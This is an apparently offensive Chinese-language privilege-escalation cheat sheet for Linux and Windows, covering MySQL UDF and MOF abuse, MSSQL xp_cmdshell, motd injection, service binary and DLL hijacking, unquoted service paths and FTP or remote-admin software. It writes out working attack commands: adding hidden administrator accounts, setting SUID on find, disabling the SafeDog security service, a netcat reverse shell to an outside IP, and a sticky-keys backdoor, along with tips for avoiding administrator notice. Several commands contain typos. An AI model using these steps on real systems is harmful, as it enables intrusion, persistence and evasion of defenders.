# 权限提升

## Linux系统提权

### (Linux内核提权)

> 使用系统漏洞，或者其他直接提权到root或者管理员权限

* **使用内核系统漏洞垂直提权**
  * 1）首先使用lsb_release -a 查看机器发行版本，如centos rhel等等
  * 2）利用searchsploit查找可用内核提权脚本
  * 3）找不出后使用uname -a查看系统内核版本，进一步缩小范围


### (Linux MySQL 提权)

* **使用mysql中的配置不当提权**
  
  * 1）是否可以自定义导出路径，secure_file_priv为空
  ```sql
  show variables like '%secure%';
  ```
  
  * 2）查看当前数据库用户权限
  ```sql
  select * from mysql.user where user = substring_index(user(),'@',1)\G;
  ```
  
  * 3）查看mysql安装位置
  ```sql
  show variables like '%basedir%';
  ```
  
  * 4）搜索UDF动态库漏洞利用程序，并在漏洞利用数据库中将其命名为“1518.c”，exploit-1518

  * 5）将c文件编译好
  ```bash
  gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc 
  ```
  
  * 6）创建一个表
  ```sql
  create table foo(line blob);
  ```
  
  * 7）写入udf文件内容
  ```sql
  insert into foo values(load_file('/tmp/1518.so'));
  ```
  
  * 8）将udf文件内容导入
  ```sql
  select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
  ```
  
  * 9）创建自定义函数udf
  ```sql
  create function do_system returns integer soname '1518.so';
  ```
  
  * 10）给find赋予超级权限
  ```sql
  select do_system('chmod u+s /usr/bin/find'); 
  ```
  
  * 11）使用find命令提权

### (Linux motd提权)

* **motd（message of the day）注入提权**
  登录ssh时会有一些欢迎信息，如果这些信息以root运行，并且用户对于这个文件可读可写时，可以提权
  
  * 1）拿到普通用户shell时，可以使用以下bash命令，获取属主为root，并且普通用户可以执行，可以写入的文件
  ```bash
  find / -type f -user root -perm -ug=x,0=w -exec ls -l '{}' \;2>/dev/null
  ```
  
  * 2）发现update-motd.d/00-header文件，进行写入，将root密码改为root123
  ```bash
  echo 'root123' | chpasswd
  ```

### (Linux polcy kit提权)

* **polcy kit配置不当提权**
  * 1）首先确认含有s位的可执行文件，发现polkit-agent-helper-1含有s位
  * 2）使用能够触发helper的执行文件，如systemd-run
  * 3）利用systemd唤起一个bash，由于helper存在s位，则是以root用户唤起一个bash，完成提取
  ```bash
  systemd-run -t /bin/bash
  ```

## Window系统提权

### (windows提权方法论)

* **一般信息收集步骤**
  * （1）用户名和主机名
  * （2）当前用户所在的组
  * （3）所有存在的用户和组
  * （4）系统版本与架构
  * （5）网络信息（为域渗透做准备）
  * （6）已经安装的软件
  * （7）正在运行的进程

* **枚举用户和组**
  * 查看当前用户和主机名
    ```powershell
    whoami
    ```
  * 查看所有组
    ```powershell
    whoami /groups
    Get-LocalGroup
    ```
  * 查看用户
    ```powershell
    net user
    Get-LocalUser
    ```
  * 查看组中含有的用户
    ```powershell
    Get-LocalGroupMember 组名
    ```
    除了非标准组之外，我们还应该分析几个内置组，例如管理员、备份操作员、远程桌面用户和远程管理用户。
    获取其中一个用户的凭据可能会引导我们访问GUI，这通常会极大地改进我们与系统交互的方式

* **枚举系统**
  * 查看系统版本和架构
    ```powershell
    systeminfo
    ```

* **枚举网络**
  * 查看网卡
    ```powershell
    ipconfig /all
    ```
  * 查看路由
    ```powershell
    route print
    ```
  * 查看端口链接
    ```powershell
    netstat -ano
    ```
  
* **枚举安装的应用**
  * 我们可以使用Get-ItemProperty Cmdlet查询两个注册表项来列出Windows注册表中的32位和64位应用程序
    ```powershell
    Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
    Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
    ```
* **枚举进程**
  * 显示所有进程
    ```powershell
    Get-Porcess
    ```
    
### (windows MSSQL提权)

* **使用MSSQL配置不当提权**
  * （1）安装组件
    ```mssql
    安装cmd_shell组件
    EXEC sp_configure 'show advanced options', 1
    GO
    RECONFIGURE
    GO 
    EXEC sp_configure 'xp_cmdshell', 1
    GO
    RECONFIGURE
    GO
    ```
    ```mssql
    删除cmd_shell组件
    EXEC sp_configure 'show advanced options', 1
    GO
    RECONFIGURE
    GO
    EXEC sp_configure 'xp_cmdshell', 0
    GO
    RECONFIGURE
    GO
    ```
  * （2）开启3389
    ```mssql
    开启3389
    exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
    ```
    ```mssql
    关闭3389
    exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
    ```
  * （3）创建用户
  * （4）权限提升
    ```cmd
    system权限的情况下：
    net stop "safedog guard center" /y
    net stop "safedog update center" /y
    net stop "safedogguardcenter" /y
    ```
    绕过安全狗：
    ```cmd
    删除安全狗服务：
    sc stop "SafeDogGuardCenter"
    sc config "SafeDogGuardCenter" start=disabled
    sc delete "Safedogguardcenter"
    
    sc stop "SafeDogupdateCenter"
    sc config "SafeDogUpdateCenter" start=disabled
    sc delete "SafedogUpdatecenter"
    
    sc stop "SafeDogCloudHeler"
    sc config "SafeDogCloudHeler" start=disabled
    sc delete "SafeDogCloudHeler"
    ```
    

### (windows MYSQL提权)

* **udf提权**
  * 原理：通过root权限导出udf.dll到系统目录下，可以通过udf.dll调用执行cmd
  * （1）查看网站源码里面数据库配置（inc,conn,config.sql,common,data等）
  * （2）查看数据库安装路径下的user.myd  (/data/mysql/)下载，本地替换
    ```mysql
    mysqld --skip-grant-tables 跳过验证
    mysql.exe -uroot    进入MySQL
    ```
  * （3）暴力破解 mysql密码破解 3306端口入侵

* **启动项提权（不常用，容易被拦截）**
  * （1）查看我们进入数据库中有些什么数据表
    ```mysql
    mysql>show tables;
    ```
    默认的情况下，test中没有任何表的存在。
  * （2）在TEST数据库下创建一个新的表；
    ```mysql
    mysql>create table a (cmd text);
    ```
    好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。
  * （3）在表中插入内容
    ```mysql
    mysql>insert into a values ("set wshshell=createobject (""wscript.shell"")");
    mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1 /add"",0)");
    mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0)");
    ```
    >注意双引号和括号以及后面的“0”一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！

  * （4）好了，现在我们来看看表a中有些什么
    ```mysql
    mysql>select * from a;
    ```
    我们将会看到表中有三行数据，就是我们刚刚输入的内容，确认你输入的内容无误后，我们来到下一步
  * （5）输出表为一个VBS的脚本文件
    ```mysql
    mysql>select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//a.vbs";
    ```
  * （6）重启即可

* **mof提权**
  * （1）上传mof.php，输入相关信息，执行命令，提权。
  * （2）上传文件x.mof，使用select命令导出入到正确位置
    ```mysql
    select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
    ```
  * （3）允许外部地址使用root用户连接的sql语句
    ```
    Grant all privileges on *.* to 'root'@'%' identified by 'root' with grant option;
    ```

* **反链端口提权**
  * 原理：让调出的cmd反向连接黑客，一般waf拦截进入的流量，不拦截出去的流量，所以可以使用反弹链接过掉waf
  * （1）利用mysql客户端工具连接mysql服务器，然后执行下面的操作。
    ```cmd
    执行命令
    mysql.exe -h 172.16.10.11 -uroot -p
    Enter password:
    mysql> \. c:\mysql.txt
    mysql>select backshell("YourIP",2010);
    ```
  * （2）本地监听你反弹的端口
    ```cmd
    nc.exe -vv -l -p 2010
    ```
    成功后，你将获得一个system权限的cmdshell，其实这个也是利用的UDF提权。



### (利用明文敏感信息提权)

* **查找有关明文敏感信息**
  * （1）利用提权信息枚举方法论，全面了解主机，一般敏感信息存储在一些会议文件，配置文件，文档等等
  * （2）确定敏感信息的类型后使用Get-ChildItem获取文件位置
    ```powershell
    Get-ChildItem -Path c:\xampp -Include *.txt,*.ini -File -Recure -ErrorAction SilentlyContinue
    ```
    这个powershell语句可以查询xampp应用中的配置文件
    ```powershell
    Get-ChildItem -Path c:\Users\dave\ -Include *.txt,*.pdf -File -Recure -ErrorAction SilentlyContinue
    ```
  * （3）当获得账号密码时查看用户是否可以远程登录，登录后再次进行铭感信息收集
    ```powershell
    runas /user:Tom@123.com cmd
    ```
    powershell切换用户
    
### (利用历史记录提权)

* **敏感历史记录种类**
  
  * （1）用户普通输入History记录
  * （2）powershell transcription：用户输入信息存储在 transcript files中，这些文件通常保存在用户的主目录、一台机器的所有用户的中心目录或从所有配置的机器收集文件的网络共享中
  * （3）powershell script block logging：这个信息记录了用户执行代码和命令
  
* **读取用户历史输入**

  * （1）History查看输入记录，但是很有可能已经被清除
    ```powershell
    Get-History
    ```
    ```powershell
    Clear-History
    ```
    清除历史数据，但是只是清除表面
  
  * （2）使用PSReadline读取历史文件
    得到用户历史输入文件保存的文件位置：
    ```powershell
    (Get-PSReadlineOption).HistorySavePath
    ```
    使用type命令读取文件
    ```powershell
    type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    ```
  * （3）Transcript文件读取
    有时在PSReadline中会读取到Start-Transcript，这时用户选择了将 PowerShell 会话的全部或部分记录创建到文本文件。 该脚本包括用户键入的所有命令和在控制台上显示的所有输出。
    >从 Windows PowerShell 5.0 开始，Start-Transcript所有脚本生成的文件名中包含主机名。 这在集中处理企业的日志记录时尤其有用。 cmdlet Start-Transcript 创建的文件在名称中包含随机字符，以防止在同时启动两个或更多脚本时可能发生的覆盖或重复。 这还可以防止未经授权地发现存储在集中文件共享中的脚本。
    
    ```powershell
    Start-Transcript -Path "c:\transcript_file"
    ```
    选择读取该文件，可进一步得知用户历史输入
    
### (劫持服务文件提权)

* **替换服务二进制文件提权**
  原理：有时用户安装软件作为window服务时，可能会将权限给到最大（对所有文件含有读写权限）并且其他用户或者用户组对其含有修改权，例如安装mysql时的管理员权限，低权限用户可能会替换服务软件导致权限提升

  * （1）查看运行中的服务
    1）使用GUI界面，win+r 后输入services.msc进入服务列表
    2）使用powershell查看
    ```powershell
    Get-CimInstance -ClassName win32_serivce | Select Name,State,PathName | where-Object {$_.State -like 'Runnning'}
    
    accessckh administrators -c *   查看用户组下所有服务
    
    access ckh users -c *
    accesschk.exe -uwcqv "users"  *      查看user组可读写的服务
    ```
    ```cmd
    net start | find "服务名称"    查看指定的服务名称有没有启动
    
    sc qc kdc      查看服务信息，kdc为服务名称  ，通过查看服务信息获取为系统权限的服务进行修改。
    sc config kdc binpath= "c:\temp\nc.exe -nv 192.168..200 3344 -e cmd.exe"
    sc config kdc obj=".\LocalSystem" password=""
    net start kdc
    ```

    >当使用网络登录(如WinRM或绑定shell)时，Get-CimInstance和Get-Service在使用非管理用户查询服务时将导致“permission denied”错误。使用交互式登录(如RDP)可以解决这个问题。

  * （2）获得可疑服务应用时，然后查看他们的权限
    ```powershell
    icalcls "c:\abc.exe"
    ```
    查看可执行文件的权限，F（完全权限），R（可读），X（可执行）,获得可读可写权限时，替换二进制文件
    
  * （3）生成病毒文件
    使用kali中跨平台编译器
    ```bash
    x86_64-w64-mingw32-gcc 病毒软件.c -o output.exe
    ```
  * （4）重启服务
    有时修改完目标服务软件，然后重启服务，这时有可能没有权限，一般管理员才有权限操纵服务开启关闭
    可以查看此服务是否是开机自动开启
    ```powershell
    Get-CimInstance -ClassName win32_service | Select Name,StartMode | Where-Object {$_.Name -like 'mysql'}
    ```
    如果是Auto，则可以重启主机运行病毒软件
    whoami /priv 查能干什么看当前用户权限
  
* **劫持服务DLL提权**
  有时没有权限修改服务对应的exe文件，即没有写权限
  可以劫持DLL
  有两种方法：
  第一：劫持服务应用使用的DLL（需要对于DLL的修改权限）同替换服务二进制文件提权
  第二：劫持windows的DLL search order（DLL搜索顺序）
  **DLL search order是由微软实现的，因为大量的DLL劫持向量，并确保DLL更难以劫持。下面的清单显示了取自Microsoft文档的标准搜索顺序**
  ```
  1. The directory from which the application loaded.
  2. The system directory.
  3. The 16-bit system directory.
  4. The Windows directory. 
  5. The current directory.
  6. The directories that are listed in the PATH environment variable.
  
    Listing 56 - Standard DLL search order on current Windows versions
  ```
  
  * （1）寻找可以服务程序
  
  * （2）使用procmon64.exe查看进程
    了解服务使用的DLL，但是要查看DLL需要管理员权限，所以可以将服务安装到本地进行测试
    >使用procmon后可能信息过于庞大，使用filter过滤想要的服务
    
  * （3）确定出现NAME NOT FOUND错误，这可以作为突破点
    ```
    $env:path   查看环境变量
    ```
  * （4）依据DLL搜索顺序，注入同名DLL，最后重启服务
    ```powershell
    Restart-Service 服务名
    ```
  
* **错误的服务路径提权**
  如果该文件的路径包含一个或多个空格，并且没有用引号括起来，则可能会成为特权升级攻击的机会
  条件：对于服务的主目录或者子目录可以修改
  该示例使用未加引号的服务二进制路径C:\Program Files\My Program\My service \service.exe。当Windows启动该服务时，由于路径中的空格，它将使用以下顺序尝试启动可执行文件。
  ```
  C:\Program.exe
  C:\Program Files\My.exe
  C:\Program Files\My Program\My.exe
  C:\Program Files\My Program\My service\service.exe
  ```
  
  * （1）找到含有空格路径的服务名称
    获取服务进程
    ```powershell
    Get-CimInstance -ClassName win32_service | Select Name,State,PathName 
    ```
    快速获取没有加双引号的服务路径
    ```powershell
    wmic service get name,pathname | findstr /i /v "c:\Windows\\" | findstr /i /v "“"
    ```
    
  * （2）利用空格截取，在目标目录插入注入软件
  * （3）重启服务

### (漏洞利用与提权)

* **漏洞搜寻**
  * 补丁提取
    ```cmd
    wmic qfe get Caption,description,hotfixid,installedon
    ```
    利用补丁提取脚本
    
    ```cmd
    systeminfo 查看补丁(需要cmd权限)
    ```
    03：pr，巴西烤肉，ms16-032，8120
    08：ms16-075（烂土豆），8120，ms15-015
    2012：同08
    
  * 搜索漏洞常用网站
    ```
    https://exploit-db.com
    https://packetstormsecurity.com
    https://packetstormsecurity.com/search/?q=ms15-057
    https://www.securityfocus.com/
    https://www.securityfocus.com/bid
    http://1337day.com
    http://0day.today
    http://seclists.org/fulldisclosure
    http://exploitsearch.net
    http://www.securiteam.com
    http://metasploit.com/modules
    http://securityreason.com
    https://cxsecurity.com/exploit
    http://securitytracker.com
    ```
  
* **提权辅助工具windows-exploit-suggester**
  * 使用方法：
    ```bash
    将服务器执行systeminfo > a.txt
    windows-exploit-suggester.py --database 2019-01-01-mssb.xls --systeminfo a.txt
    windows-exploit-suggester.py --audit --database 2019-01-01-mssb.xls --systeminfo a.txt
    windows-exploit-suggester.py --audit  -l --database 2019-01-01-mssb.xls --systeminfo a.txt
    ```
  
* **溢出提权**
  * 方法：
    ```cmd
    找到未打补丁的漏洞编号
    poc.exe muma.exe   以管理员身份运行远控木马
    ```
    ```cmd
    poc.exe “whoami”查看执行身份权限
    poc.exe “net user x 123.com /add”
    poc.exe “net localgroup administrators x /add”
    poc.exe “getpass.exe” 获取hash
    ```




### (windows自动任务)






&nbsp;


## 应用程序提权

### (常见服务程序和中间件)

* **FTP软件**：
  * server-u
  * g6ftp
  * FileZilla

* **远程管理软件**
  * PCanywhere
  * radmin
  * vnc

* **中简件（含有高权限）**
  * winmail server
  * phpstudy
  * wamp
  * upupw
  * tomcat
  * Strus2

### (server-u提权)

* **条件**
  * 有修改权限
  * 检查是否有可写权限   修改server-u默认安装目录下的ServUDaemon.ini

* **方法**
  * （1）增加用户
  * （2）连接
  * （3）执行命令
    ```
    quote site exec net user cracer cracer.com /add
    quote site exec net localgroup administrators cracer /add
    ```
  
* **无修改权限**
  * 暴力破解md5
  * 溢出提权
>要注意创建用户会被管理员发现，可以使用powershell一类代码可以创建反弹链接


### (g6ftp提权)

* **条件**
  * g6ftp一般侦听本地端口，需要端口转发

* **方法**
  * （1）下载管理配置文件，将adminnistraotr管理密码破解
  * （2）使用lcx 端口转发（默认只允许本机连接）
    ```powershell
    lcx.exe -tran 8027 127.0.0.1 8021
    ```
  * （3）使用客户端以管理员用户登录
  * （4）创建用户并设置权限和执行的批处理文件
  * （5）上传批处理
  * （6）以创建的普通用户登录ftp
  * （7）执行命令 quote site adduser
  * （8）x.bat  内容为 添加系统用户 提权


### (filezilla提权)

* **方法**
  * （1）并且默认安装目录目录下有两个敏感文件 filezillaserver.xml（包含了用户信息）和filezillaserver interface.xml（包含了管理信息）
  * （2）若安装了服务器端默认只侦听127.0.0.1的14147端口
  * （3）下载这个两个文件，拿到管理密码
  * （4）配置端口转发，登录远程管理ftpserve，创建ftp用户
  * （5）分配权限，设置家目录为C:\
  * （6）使用cmd.exe改名为sethc.exe替换c:\windows\system32\sethc.exe生成shift后门
  * （7）连接3389按5次shift 调出cmd.exe

* **宝塔提权**
  * （1）首先是否可以执行命令
  * （2）创建ftp账号
  * （3）将ftp的家目录设置为宝塔所在盘（即可以对盘内的代码进行修改查看）
  * （4）寻找api的目录，获取token
  * （5）使用脚本利用token插入命令，时system权限


### (远程管理软件提权)

* **pcanywhere**
  * 访问pcanywhere默认安装目录
  * 下载用户配置文件
  * 通过破解账户密码文件
  >如果外部登录会被管理员发现，由于同步显示

* **radmin**
  * 通过端口扫描  扫描4899端口
  * 上传radmin.asp木马读取radmin的加密密文
  * 使用工具连接
  >可以利用脚本读取radmin的注册表，其中包括密码

* **vnc**
  * 读取注册表得到十进制数，转换为16进制

